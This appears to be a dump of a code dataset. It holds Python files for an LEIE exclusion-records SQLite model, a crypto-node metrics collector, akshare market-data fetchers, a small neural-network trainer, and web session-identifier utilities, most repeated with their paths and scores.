"""Find and return the latest month and year in the list of exclusion
actions. Return this value as a string formatted
"YYYY-MM-DD".
If there are no rows, return "".
"""
return self.get_latest_date("exclusion", "excldate")
def get_latest_reinstatement_date(self):
"""Find and return the latest month and year in the list of
reinstatement actions. Return this value as a string
formatted "YYYY-MM-DD".
If there are no rows, return "".
"""
return self.get_latest_date("reinstatement", "reindate")
def get_log(self, rowid=None, limit=10, start=0, form="list"):
"""Return all the rows from the log table up to LIMIT rows
if ROWID is set, we just return that row and LIMIT parameter has no effect. If that row doesn't exist, return None.
FORM can be 'list' or 'dict'. If 'list', return rows as lists. If dict, return rows as dicts.
If START is specified... I dunno. not implemented yet.
"""
assert form in ["list", "dict"]
crsr = self.conn.cursor()
# Return just the requested row
if rowid:
return crsr.execute("SELECT rowid, * FROM log WHERE rowid=?", [rowid]).fetchone()
# Return a range of rows
rows = crsr.execute("SELECT rowid, * FROM log ORDER BY datetime DESC LIMIT ?", [limit]).fetchall()
if form == 'list':
return rows
return [self.row_to_dict(r, description=crsr.description) for r in rows]
def log(self, datatype, message, now=""):
"""Add a MESSAGE string about a DATATYPE (either updated or
reinstatement) to the log table in the db.
Else, NOW = a datestring we can parse. It can be anything
whose str representation is a parseable datetime, including a
datetime.
"""
assert datatype in ["updated", "reinstatement"]
info("%s: %s" % (datatype, message))
# See http://sqlite.org/datatype3.html for info on date formats in sqlite3
if not now:
now = datetime.datetime.now().isoformat()
else:
now = dateutil.parser.parse(str(now)).isoformat()
crsr = self.conn.cursor()
crsr.execute("INSERT INTO log VALUES(?,?,?)", (now, datatype, message))
self.conn.commit()
class Exclusion(dict):
"""Model of an exclusion.
This is just a dict that we're wrapping in a class so we can
attach methods to it.
"""
def __init__(self, dictionary):
dict.__init__(self)
self.update(dictionary)
def fhir(self, form="dict"):
"""Return the data of this instance in a way that complies with FHIR.
First, we assemble it as a dict, then convert it to JSON or XML if FORM
is json' or 'xml'.
"""
ret = self.copy()
ret['resourceType'] = 'Exclusion'
if form == "dict":
return ret
if form == "xml":
return dicttoxml.dictotoxml(ret)
return json.dumps(ret)
def main(dirname=None):
logger = log.logger()
logger.info('Running model.py directly to produce schema/goose output.')
conn = SQL(connect=False)
fnames = conn.goose_write(dirname)
logger.info('Finished running model.py directly to produce schema/goose output.')
return fnames
if __name__ == '__main__':
main() | leie/leie/model.py |
import datetime
import dateutil.parser
import os
from path import cd
import simplejson as json
import sqlite3
import subprocess
import sys
import yaml
import log
warn, info, debug, fatal = log.reporters()
class UnsupportedDBType(Exception):
pass
class DBNotFound(Exception):
pass
class DBConn(object):
def __init__(self, db_name="development", db_conf_file="", connect=True):
"""Open a database connection, creating db if needed, and generally
get ready to store stuff.
DB_NAME is the name of the database to target from dbconf.yml.
If DB_CONF_FILE isn't specified, we use a stock one of defaults.
Goose migrations used dbconf.yml files, so for convenience, we
just read any needed data from that file.
If CONNECT is true, we open a db connection.
"""
self.db_name = db_name
if os.path.exists(db_conf_file):
# slurp dbconf.yml
with open(db_conf_file) as INF:
self.db_conf = yaml.load(INF)[db_name]
else:
info("dbconf.yml not found, using default config values (db will be leie.sqlite3)")
self.db_name = "development"
self.db_conf = yaml.load("development:\n driver: sqlite3\n open: leie.sqlite3\n")[self.db_name]
# If we're not opening a connection, we're done
if not connect:
return
# open and hang on to a db connection for later use
if self.db_conf['driver'] == 'sqlite3':
self.conn = sqlite3.connect(self.db_conf['open'])
else:
raise UnsupportedDBType("We don't support databases of type %s" % self.db_conf['driver'])
def close(self):
"""Commit and close the db connection"""
self.conn.commit()
self.conn.close()
def table_len(self, table):
"""Return the number of total rows in the TABLE"""
c = self.conn.cursor()
return (c.execute("SELECT Count(*) FROM %s" % table).fetchone()[0])
def row_to_dict(self, row, field=None, description=None):
"""
FIELD is a list or tuple of field names
DESCRIPTION is the results of cursor.description from sqlite
Either FIELD or DESCRIPTION must be present, but not both.
ROW is a tuple of values
Returns a dict with the keys taken from FIELD and the values taken from ROW.
"""
assert field or description
assert not (field and description)
if description:
field = [c[0] for c in description]
field = ['id' if f == 'rowid' else f for f in field]
return dict(zip(field, row))
class SQL(DBConn):
"""All the sql and goose stuff goes in this class.
We generate the SQL here becuase in the future I think we might want some
smart/scripted way to manage sql for different DB types."""
def down(self, migration):
"""Returns schema sql for migrating the db down
Specify a MIGRATION, the first being 0 on up to the latest.
If you specify a migration beyond our total, we return
None.
"""
if migration == 0:
return """
DROP TABLE exclusion;
DROP TABLE reinstatement;
"""
if migration == 1:
return "DROP TABLE log;"
def goose(self):
"""Returns a dict of goose migrations. The keys are filenames and the
values are the contents of the goose files.
We only have one migration so far, so this is pretty easy.
"""
fnames = ["20170515130501_initial_create.sql"
,"20170606100001_create_log.sql"
]
migrations = {}
for a in range(len(fnames)):
migrations[fnames[a]] = "-- +goose Up\n" + self.up(a) + "\n-- +goose Down\n" + self.down(a) + "\n"
return migrations
def goose_write(self, dirname=None):
"""Writes any needed migration files to the migrations directory
specified by DIRNAME. Leave DIRNAME as None to just use
./db as the migrations directory.
Returns list of paths to created files.
"""
if not dirname:
dirname = os.path.join(os.path.dirname(__file__), "db")
dirname = os.path.join(dirname, self.db_conf['driver'])
os.makedirs(dirname, exist_ok=True)
created = []
for fname, migration in self.goose().items():
fname = os.path.join(dirname, fname)
if os.path.exists(fname):
debug("Migration " +fname+" already exists. Overwriting.")
created.append(fname)
info("Writing migration to " + fname)
with open(fname, 'w') as OUTF:
OUTF.write(migration)
return created
def migrate(self):
"""Bring the db schema up to date by running any needed model
migrations."""
debug(self.db_conf)
dirname = os.path.dirname(self.db_conf['open'])
if not dirname:
dirname = os.path.dirname(__file__)
with cd(dirname):
# Make sure the sqlite3 db exists before we try to migrate it
if not os.path.exists(os.path.basename(self.db_conf['open'])):
raise DBNotFound("DB %s doesn't exist, so we can't migrate it." % self.db_conf['open'])
# Goose apparently returns 0 even when it errors, so we
# have to check stderr and react accordingly.
cmd = "goose -dir db/{0} {0} {1} up".format(self.db_conf['driver'], os.path.basename(self.db_conf['open']))
debug("Executing `%s`" % cmd)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
out, err = p.communicate()
out = out.decode("utf-8")
err = err.decode("utf-8")
if p.returncode != 0:
sys.stderr.write("%s\n%s" % (out, err))
raise subprocess.CalledProcessError(p.returncode, cmd, out+err)
return out
def up(self, migration):
"""Returns schema sql for migrating the db up.
Specify a MIGRATION, the first being 0 on up to the latest.
If you specify a migration beyond our total, we return
None.
"""
# We only handle sqlite for now
if self.db_conf['driver'] != "sqlite3":
raise UnsupportedDBType("We don't have migrations for %s" % self.db_conf['driver'])
if migration == 0:
common_rows = """
lastname text check(lastname is null or length(lastname) <= 20),
firstname text check(firstname is null or length(firstname) <= 15),
midname text check(midname is null or length(midname) <= 15),
busname text check(busname is null or length(busname) <= 30),
general text check(general is null or length(general) <= 20),
specialty text check(specialty is null or length(specialty) <= 20),
upin text check(upin is null or length(upin) <= 6),
npi integer check(npi is null or npi<10000000000),
dob text check(dob is null or length(dob) <= 23),
address text check(address is null or length(address) <= 30),
city text check(city is null or length(city) <= 20),
state text check(state is null or length(state) <= 2),
zip integer check(zip is null or zip < 100000),
excltype text not null check(excltype is null or length(excltype) <= 8),
excldate text not null check(excldate is null or length(excldate) <= 23),
reindate text check(reindate is null or length(reindate) <= 23),
waiverdate text check(waiverdate is null or length(waiverdate) <= 23),
waiverstate text check(waiverstate is null or length(waiverstate) <= 2)
"""
return("CREATE TABLE IF NOT EXISTS exclusion (" + common_rows + ");\n"
+ "CREATE TABLE IF NOT EXISTS reinstatement (" + common_rows + ");\n")
elif migration == 1:
return """
CREATE TABLE IF NOT EXISTS log (
datetime text,
datatype text,
msg text);
"""
else:
return None
class LEIE(SQL):
"""This is a DAO class but not an ORM class. We're modeling the
database, not the data. Maybe that will change, but it works for
now.
"""
def count_exclusions(self):
"""Return number of rows in the exclusion table"""
return self.table_len("exclusion")
def dedupe(self, table):
"""
Remove any duplicate rows from TABLE
"""
# Look for duplicate entries
seen = set()
uniq = []
dup = []
c = self.conn.cursor()
for x in c.execute("SELECT * FROM %s" % table).fetchall():
if x not in seen:
uniq.append(x)
seen.add(x)
else:
dup.append(x)
# We're done if there are no dupes
if not dup:
return
# Uh-oh, better fess up and clean up
warn("Duplicate reinstatements found in %s!" % table)
info("Cleaning duplicate reinstatements from %s" % table)
c.execute("delete from {0} where rowid not in (select max(rowid) from {0} group by {1})".format(
table,
", ".join(self.get_header(table))
))
def dedupe_reinstatements(self):
"""
Make sure there are no duplicate rows in the reinstatement table.
"""
self.dedupe("reinstatement")
def get_download_datetime(self, fname):
"""Return the logged time of the last download of the file named FNAME
If it's not there, return None"""
c = self.conn.cursor()
all = c.execute("SELECT * FROM log WHERE msg=?", ["Downloaded " + fname]).fetchall()
if not all:
return None
return dateutil.parser.parse(all[-1][0])
def get_exclusions(self, limit=10, page=1, filter={}, form="list"):
"""Return all the rows from the log table up to LIMIT rows
FORM can be 'list' or 'dict'. If 'list', return rows as
lists. If dict, return rows as dicts.
If PAGE is specified, we skip the first (PAGE-1)*LIMIT rows
and return LIMIT rows from there.
"""
assert form in ["list", "dict"]
assert page >= 1
assert limit >= 1
crsr = self.conn.cursor()
# Make strings for the filters to be inserted in to the sql
# query. Also, make a list of arguments for the query.
args = [limit*(page-1)]
query = ["SELECT rowid, * FROM exclusion",
"WHERE rowid NOT IN ( SELECT rowid FROM exclusion ORDER BY excldate DESC LIMIT ?)"
]
for k,v in filter.items():
if v:
query.append("AND %s=?" % k)
args.append(v)
query.append("ORDER BY excldate DESC LIMIT ?")
args.append(limit)
# Return a range of rows
rows = crsr.execute(" ".join(query), args).fetchall()
if form == 'list':
return rows
return [Exclusion(self.row_to_dict(r, description=crsr.description)) for r in rows]
def get_header(self, table):
"""Returns a list of the column names in TABLE"""
c = self.conn.cursor()
return [f[1] for f in c.execute("PRAGMA table_info(%s)" % table).fetchall()]
def get_latest_date(self, table, field):
"""Find and return the latest month and year in the list of actions in
TABLE by looking at dates in FIELD. Return this value as a
string formatted "YYYY-MM-DD".
If there are no rows, return "".
"""
crsr = self.conn.cursor()
d = crsr.execute("SELECT {1} FROM {0} ORDER BY date({1}) DESC Limit 1".format(table, field)).fetchone()
if not d:
return ""
return d[0][:10]
def get_latest_exclusion_date(self):
"""Find and return the latest month and year in the list of exclusion
actions. Return this value as a string formatted
"YYYY-MM-DD".
If there are no rows, return "".
"""
return self.get_latest_date("exclusion", "excldate")
def get_latest_reinstatement_date(self):
"""Find and return the latest month and year in the list of
reinstatement actions. Return this value as a string
formatted "YYYY-MM-DD".
If there are no rows, return "".
"""
return self.get_latest_date("reinstatement", "reindate")
def get_log(self, rowid=None, limit=10, start=0, form="list"):
"""Return all the rows from the log table up to LIMIT rows
if ROWID is set, we just return that row and LIMIT parameter has no effect. If that row doesn't exist, return None.
FORM can be 'list' or 'dict'. If 'list', return rows as lists. If dict, return rows as dicts.
If START is specified... I dunno. not implemented yet.
"""
assert form in ["list", "dict"]
crsr = self.conn.cursor()
# Return just the requested row
if rowid:
return crsr.execute("SELECT rowid, * FROM log WHERE rowid=?", [rowid]).fetchone()
# Return a range of rows
rows = crsr.execute("SELECT rowid, * FROM log ORDER BY datetime DESC LIMIT ?", [limit]).fetchall()
if form == 'list':
return rows
return [self.row_to_dict(r, description=crsr.description) for r in rows]
def log(self, datatype, message, now=""):
"""Add a MESSAGE string about a DATATYPE (either updated or
reinstatement) to the log table in the db.
Else, NOW = a datestring we can parse. It can be anything
whose str representation is a parseable datetime, including a
datetime.
"""
assert datatype in ["updated", "reinstatement"]
info("%s: %s" % (datatype, message))
# See http://sqlite.org/datatype3.html for info on date formats in sqlite3
if not now:
now = datetime.datetime.now().isoformat()
else:
now = dateutil.parser.parse(str(now)).isoformat()
crsr = self.conn.cursor()
crsr.execute("INSERT INTO log VALUES(?,?,?)", (now, datatype, message))
self.conn.commit()
class Exclusion(dict):
"""Model of an exclusion.
This is just a dict that we're wrapping in a class so we can
attach methods to it.
"""
def __init__(self, dictionary):
dict.__init__(self)
self.update(dictionary)
def fhir(self, form="dict"):
"""Return the data of this instance in a way that complies with FHIR.
First, we assemble it as a dict, then convert it to JSON or XML if FORM
is json' or 'xml'.
"""
ret = self.copy()
ret['resourceType'] = 'Exclusion'
if form == "dict":
return ret
if form == "xml":
return dicttoxml.dictotoxml(ret)
return json.dumps(ret)
def main(dirname=None):
logger = log.logger()
logger.info('Running model.py directly to produce schema/goose output.')
conn = SQL(connect=False)
fnames = conn.goose_write(dirname)
logger.info('Finished running model.py directly to produce schema/goose output.')
return fnames
if __name__ == '__main__':
main() | 0.535098 | 0.176512 |
from subprocess import Popen, PIPE
import json
import os
import time
def fetch_vds_info_state():
balance, version, blocks = 0, 0, 0
try:
raw_data = Popen(['vds-cli', 'getinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
balance = vds_info["balance"]
version = vds_info["version"]
blocks = vds_info["blocks"]
except OSError:
pass
create_record('vds.info.balance', balance)
create_record('vds.info.version', version)
create_record('vds.info.blocks', blocks)
def fetch_vds_mininginfo_state():
genproclimit, localsolps, generate, pooledtx = 0, 0, False, 0
try:
raw_data = Popen(['vds-cli', 'getmininginfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
genproclimit = vds_info["genproclimit"]
localsolps = vds_info["localsolps"]
generate = vds_info["generate"]
pooledtx = vds_info["pooledtx"]
except OSError:
pass
create_record('vds.mininginfo.genproclimit', genproclimit)
create_record('vds.mininginfo.localsolps', localsolps)
create_record('vds.mininginfo.generate', generate)
create_record('vds.mininginfo.pooledtx', pooledtx)
def fetch_vds_mempoolinfo_state():
mempoolsize = 0
try:
raw_data = Popen(['vds-cli', 'getmempoolinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
mempoolsize = vds_info["size"]
except OSError:
pass
create_record('vds.mempoolinfo.size', mempoolsize)
def create_record(metric, value):
record = {}
record['Metric'] = metric
record['Endpoint'] = os.uname()[1]
record['Timestamp'] = int(time.time())
record['Step'] = 600
record['Value'] = value
record['CounterType'] = 'GAUGE'
record['TAGS'] = 'vds'
data.append(record)
if __name__ == '__main__':
data = []
fetch_vds_info_state()
fetch_vds_mempoolinfo_state()
fetch_vds_mininginfo_state()
print json.dumps(data) | 600_vds.py |
from subprocess import Popen, PIPE
import json
import os
import time
def fetch_vds_info_state():
balance, version, blocks = 0, 0, 0
try:
raw_data = Popen(['vds-cli', 'getinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
balance = vds_info["balance"]
version = vds_info["version"]
blocks = vds_info["blocks"]
except OSError:
pass
create_record('vds.info.balance', balance)
create_record('vds.info.version', version)
create_record('vds.info.blocks', blocks)
def fetch_vds_mininginfo_state():
genproclimit, localsolps, generate, pooledtx = 0, 0, False, 0
try:
raw_data = Popen(['vds-cli', 'getmininginfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
genproclimit = vds_info["genproclimit"]
localsolps = vds_info["localsolps"]
generate = vds_info["generate"]
pooledtx = vds_info["pooledtx"]
except OSError:
pass
create_record('vds.mininginfo.genproclimit', genproclimit)
create_record('vds.mininginfo.localsolps', localsolps)
create_record('vds.mininginfo.generate', generate)
create_record('vds.mininginfo.pooledtx', pooledtx)
def fetch_vds_mempoolinfo_state():
mempoolsize = 0
try:
raw_data = Popen(['vds-cli', 'getmempoolinfo'], stdout=PIPE, stderr=PIPE).communicate()[0]
vds_info = json.loads(raw_data)
mempoolsize = vds_info["size"]
except OSError:
pass
create_record('vds.mempoolinfo.size', mempoolsize)
def create_record(metric, value):
record = {}
record['Metric'] = metric
record['Endpoint'] = os.uname()[1]
record['Timestamp'] = int(time.time())
record['Step'] = 600
record['Value'] = value
record['CounterType'] = 'GAUGE'
record['TAGS'] = 'vds'
data.append(record)
if __name__ == '__main__':
data = []
fetch_vds_info_state()
fetch_vds_mempoolinfo_state()
fetch_vds_mininginfo_state()
print json.dumps(data) | 0.228845 | 0.095856 |
import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
"""
主流数字货币的实时行情数据, 一次请求返回具体某一时刻行情数据
:return: pandas.DataFrame
"""
bit_payload = bitcoin_payload.copy()
bit_payload.update({"_": int(time.time() * 1000)})
bit_payload.update(
{
"jsonpCallback": bitcoin_payload["jsonpCallback"].format(
int(time.time() * 1000)
)
}
)
res = requests.get(bitcoin_url, params=bit_payload)
json_data = json.loads(res.text[res.text.find("{"): res.text.rfind("}") + 1])
data_df = pd.DataFrame(json_data["data"])
data_df.set_index("update", drop=True, inplace=True)
data_df.index = pd.to_datetime(data_df.index)
return data_df.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
"""
金十数据-外汇-投机情绪报告
外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
报告内容: 品种: 澳元兑日元、澳元兑美元、欧元兑美元、欧元兑澳元、欧元兑日元、英镑兑美元、英镑兑日元、纽元兑美元、美元兑加元、美元兑瑞郎、美元兑日元以及现货黄金兑美元。
数据: 由Shark - fx整合全球8家交易平台( 包括Oanda、 FXCM、 Insta、 Dukas、 MyFxBook以及FiboGroup) 的多空投机仓位数据而成。
名词释义: 外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
工具使用策略: Shark-fx声明表示,基于“主流通常都是错误的”的事实,当空头头寸超过60%,交易者就应该建立多头仓位; 同理,当市场多头头寸超过60%,交易者则应该建立空头仓位。此外,当多空仓位比例接近50%的情况下,我们则倾向于建议交易者不要进场,保持观望。
https://datacenter.jin10.com/reportType/dc_ssi_trends
:param start_date: 具体交易日
:type start_date: str
:param end_date: 具体交易日, 与 end_date 相同
:type end_date: str
:return: 投机情绪报告
:rtype: pandas.DataFrame
"""
url = "https://datacenter-api.jin10.com/sentiment/datas"
params = {
"start_date": start_date,
"end_date": end_date,
"currency_pair": "",
"_": int(time.time() * 1000),
}
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
"cache-control": "no-cache",
"origin": "https://datacenter.jin10.com",
"pragma": "no-cache",
"referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"x-app-id": "rU6QIu7JHe2gOUeR",
"x-csrf-token": "",
"x-version": "1.0.0",
}
res = requests.get(url, params=params, headers=headers)
return pd.DataFrame(res.json()["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df) | akshare/economic/macro_other.py | import json
import time
import pandas as pd
import requests
from akshare.economic.cons import bitcoin_url, bitcoin_payload
def get_js_dc_current():
"""
主流数字货币的实时行情数据, 一次请求返回具体某一时刻行情数据
:return: pandas.DataFrame
"""
bit_payload = bitcoin_payload.copy()
bit_payload.update({"_": int(time.time() * 1000)})
bit_payload.update(
{
"jsonpCallback": bitcoin_payload["jsonpCallback"].format(
int(time.time() * 1000)
)
}
)
res = requests.get(bitcoin_url, params=bit_payload)
json_data = json.loads(res.text[res.text.find("{"): res.text.rfind("}") + 1])
data_df = pd.DataFrame(json_data["data"])
data_df.set_index("update", drop=True, inplace=True)
data_df.index = pd.to_datetime(data_df.index)
return data_df.iloc[:, :-4]
def macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07"):
"""
金十数据-外汇-投机情绪报告
外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
报告内容: 品种: 澳元兑日元、澳元兑美元、欧元兑美元、欧元兑澳元、欧元兑日元、英镑兑美元、英镑兑日元、纽元兑美元、美元兑加元、美元兑瑞郎、美元兑日元以及现货黄金兑美元。
数据: 由Shark - fx整合全球8家交易平台( 包括Oanda、 FXCM、 Insta、 Dukas、 MyFxBook以及FiboGroup) 的多空投机仓位数据而成。
名词释义: 外汇投机情绪报告显示当前市场多空仓位比例,数据由8家交易平台提供,涵盖11个主要货币对和1个黄金品种。
工具使用策略: Shark-fx声明表示,基于“主流通常都是错误的”的事实,当空头头寸超过60%,交易者就应该建立多头仓位; 同理,当市场多头头寸超过60%,交易者则应该建立空头仓位。此外,当多空仓位比例接近50%的情况下,我们则倾向于建议交易者不要进场,保持观望。
https://datacenter.jin10.com/reportType/dc_ssi_trends
:param start_date: 具体交易日
:type start_date: str
:param end_date: 具体交易日, 与 end_date 相同
:type end_date: str
:return: 投机情绪报告
:rtype: pandas.DataFrame
"""
url = "https://datacenter-api.jin10.com/sentiment/datas"
params = {
"start_date": start_date,
"end_date": end_date,
"currency_pair": "",
"_": int(time.time() * 1000),
}
headers = {
"accept": "*/*",
"accept-encoding": "gzip, deflate, br",
"accept-language": "zh-CN,zh;q=0.9,en;q=0.8",
"cache-control": "no-cache",
"origin": "https://datacenter.jin10.com",
"pragma": "no-cache",
"referer": "https://datacenter.jin10.com/reportType/dc_ssi_trends",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-site",
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36",
"x-app-id": "rU6QIu7JHe2gOUeR",
"x-csrf-token": "",
"x-version": "1.0.0",
}
res = requests.get(url, params=params, headers=headers)
return pd.DataFrame(res.json()["data"]["values"])
if __name__ == "__main__":
get_js_dc_current_df = get_js_dc_current()
print(get_js_dc_current_df)
macro_fx_sentiment_df = macro_fx_sentiment(start_date="2020-02-07", end_date="2020-02-07")
print(macro_fx_sentiment_df) | 0.308503 | 0.252493 |
from neuron import Neuron
from utils import absolute
import random
class Network:
def __init__(self, neurons_quantity, lamb, alpha, threshold, weights):
'''
Configura a rede neural
:param neurons_quantity: Quantidade de neurônios na primeira camada
:param lamb: lambda
:param alpha: alfa
:param threshold: erro máximo aceitável
:param weights: listas de pesos de todos os neurônios
'''
self.first_layer = [Neuron(weights[n], lamb, alpha) for n in range(neurons_quantity)]
self.last_layer = Neuron(weights[-1], lamb, alpha)
self.threshold = threshold
def run(self, inputs):
'''
Roda um processo pela rede.
:param inputs: entradas da rede
:return: saída da rede
'''
layer_outputs = []
for n in self.first_layer:
layer_outputs.append(n.run(inputs))
last_output = self.last_layer.run(layer_outputs)
return last_output
def update(self, inputs, expected):
'''
Atualiza os pesos com base na saída esperada
:param inputs: entradas da rede
:param expected: saída esperada
'''
layer_outputs = []
for n in self.first_layer:
layer_outputs.append(n.run(inputs))
last_output = self.last_layer.run(layer_outputs)
hidden_layer_errors = self.last_layer.update(expected - last_output)
for pos, n in enumerate(self.first_layer):
n.update(hidden_layer_errors[pos])
print(f'Neurônio {pos}: {n.weights}')
print(f'Neurônio final: {self.last_layer.weights}')
def train(self, data):
'''
Realiza atualização da rede até que o erro esteja dentro
do limite aceitável.
:param data: dados de treinamento
'''
print('=== Pesos iniciais ===')
for pos, n in enumerate(self.first_layer):
print(f'Neurônio {pos}: {n.weights}')
print(f'Neurônio final: {self.last_layer.weights}')
error = 1
it = 0
while error > self.threshold:
it = it + 1
print(f'=== Iteração {it} ===')
rand = random.randint(0, 3)
self.update(data[rand][0:2], data[rand][2])
total = 0
for d in data:
total = total + absolute(d[2] - self.run(d[0:2]))
error = total / len(data)
print(f'Erro: {error}') | network.py | from neuron import Neuron
from utils import absolute
import random
class Network:
def __init__(self, neurons_quantity, lamb, alpha, threshold, weights):
'''
Configura a rede neural
:param neurons_quantity: Quantidade de neurônios na primeira camada
:param lamb: lambda
:param alpha: alfa
:param threshold: erro máximo aceitável
:param weights: listas de pesos de todos os neurônios
'''
self.first_layer = [Neuron(weights[n], lamb, alpha) for n in range(neurons_quantity)]
self.last_layer = Neuron(weights[-1], lamb, alpha)
self.threshold = threshold
def run(self, inputs):
'''
Roda um processo pela rede.
:param inputs: entradas da rede
:return: saída da rede
'''
layer_outputs = []
for n in self.first_layer:
layer_outputs.append(n.run(inputs))
last_output = self.last_layer.run(layer_outputs)
return last_output
def update(self, inputs, expected):
'''
Atualiza os pesos com base na saída esperada
:param inputs: entradas da rede
:param expected: saída esperada
'''
layer_outputs = []
for n in self.first_layer:
layer_outputs.append(n.run(inputs))
last_output = self.last_layer.run(layer_outputs)
hidden_layer_errors = self.last_layer.update(expected - last_output)
for pos, n in enumerate(self.first_layer):
n.update(hidden_layer_errors[pos])
print(f'Neurônio {pos}: {n.weights}')
print(f'Neurônio final: {self.last_layer.weights}')
def train(self, data):
'''
Realiza atualização da rede até que o erro esteja dentro
do limite aceitável.
:param data: dados de treinamento
'''
print('=== Pesos iniciais ===')
for pos, n in enumerate(self.first_layer):
print(f'Neurônio {pos}: {n.weights}')
print(f'Neurônio final: {self.last_layer.weights}')
error = 1
it = 0
while error > self.threshold:
it = it + 1
print(f'=== Iteração {it} ===')
rand = random.randint(0, 3)
self.update(data[rand][0:2], data[rand][2])
total = 0
for d in data:
total = total + absolute(d[2] - self.run(d[0:2]))
error = total / len(data)
print(f'Erro: {error}') | 0.797439 | 0.604049 |
from binascii import unhexlify
from hashlib import md5, sha256
from hmac import compare_digest
from hmac import new as hmac
from os import getpid
from random import randint
from socket import getaddrinfo as _forward, gethostbyaddr as _reverse, gethostname, herror as DNSError
from threading import RLock
from time import time
from typing import Optional, Set
from cachetools.func import ttl_cache
log = __import__('logging').getLogger(__name__)
MACHINE = int(md5(gethostname().encode()).hexdigest()[:6], 16)
class SignatureError(ValueError):
pass
class Counter:
def __init__(self):
self.value = randint(0, 2**24)
self.lock = RLock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
self.value = (self.value + 1) % 0xFFFFFF
value = self.value
return value
next = __next__
counter = Counter()
class DNS:
TTL_ENTRIES: int = 128
TTL_TIME: int = 60 * 60 # One hour.
@staticmethod
@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
def resolve(host:str) -> Set[str]:
"""Perform a cached forward DNS lookup.
Retrieves the full set of identified IP addresses associated with the DNS name. This does not use
`socket.gethostbyname` because there may be a pool of addresses associated with the rDNS name, not just one.
Can generate statistics from live operation by calling the `cache_info` method:
>>> DNS.resolve.cache_info()
CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
"""
try:
return {resolution[4][0] for resolution in _forward(host, 80)}
except DNSError:
return set()
@staticmethod
@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
def reverse(addr:str) -> Optional[str]:
"""Perform a cached reverse DNS lookup.
Can generate statistics from live operation by calling the `cache_info` method:
>>> DNS.reverse.cache_info()
CacheInfo(hits=28, misses=16, maxsize=128, currsize=16)
"""
try:
return _reverse(addr)[0]
except DNSError:
return None
class SessionIdentifier:
def __init__(self, value=None):
if value:
self.parse(value)
else:
self.generate()
def parse(self, value):
self.time = int(value[:8], 16)
self.machine = int(value[8:14], 16)
self.process = int(value[14:18], 16)
self.counter = int(value[18:24], 16)
def generate(self):
self.time = int(time())
self.machine = MACHINE
self.process = getpid() % 0xFFFF
self.counter = next(counter)
def __bytes__(self):
return str(self).encode('ascii')
def __str__(self):
return f"{self.time:08x}{self.machine:06x}{self.process:04x}{self.counter:06x}"
def __repr__(self):
return f"{self.__class__.__name__}('{self}')"
class SignedSessionIdentifier(SessionIdentifier):
__slots__ = ('__secret', '__signature', 'expires')
def __init__(self, value=None, secret=None, expires=None):
self.__secret = secret.encode('ascii') if hasattr(secret, 'encode') else secret
self.__signature = None
self.expires = expires
super().__init__(value)
def parse(self, value):
if len(value) != 88:
raise SignatureError("Invalid signed identifier length.")
super().parse(value)
self.__signature = value[24:].encode('ascii')
if not self.valid:
raise SignatureError("Invalid signed identifier.")
@property
def signed(self):
return bytes(self) + self.signature
@property
def signature(self):
if not self.__signature:
self.__signature = hmac(
self.__secret,
unhexlify(bytes(self)),
sha256
).hexdigest()
if hasattr(self.__signature, 'encode'):
self.__signature = self.__signature.encode('ascii')
return self.__signature
@property
def valid(self):
if not self.__signature:
raise SignatureError("No signature present.")
return False
if self.expires and (time() - self.time) > self.expires:
raise SignatureError("Expired signature.")
return False
challenge = hmac(
self.__secret,
unhexlify(bytes(self)),
sha256
).hexdigest()
if hasattr(challenge, 'encode'):
challenge = challenge.encode('ascii')
result = compare_digest(challenge, self.signature)
if not result:
raise SignatureError("Invalid signature:", repr(challenge), repr(self.signature))
return False
return True | web/security/util.py | from binascii import unhexlify
from hashlib import md5, sha256
from hmac import compare_digest
from hmac import new as hmac
from os import getpid
from random import randint
from socket import getaddrinfo as _forward, gethostbyaddr as _reverse, gethostname, herror as DNSError
from threading import RLock
from time import time
from typing import Optional, Set
from cachetools.func import ttl_cache
log = __import__('logging').getLogger(__name__)
MACHINE = int(md5(gethostname().encode()).hexdigest()[:6], 16)
class SignatureError(ValueError):
pass
class Counter:
def __init__(self):
self.value = randint(0, 2**24)
self.lock = RLock()
def __iter__(self):
return self
def __next__(self):
with self.lock:
self.value = (self.value + 1) % 0xFFFFFF
value = self.value
return value
next = __next__
counter = Counter()
class DNS:
TTL_ENTRIES: int = 128
TTL_TIME: int = 60 * 60 # One hour.
@staticmethod
@ttl_cache(maxsize=TTL_ENTRIES, ttl=TTL_TIME)
def resolve(host:str) -> Set[str]:
"""Perform a cached forward DNS lookup.
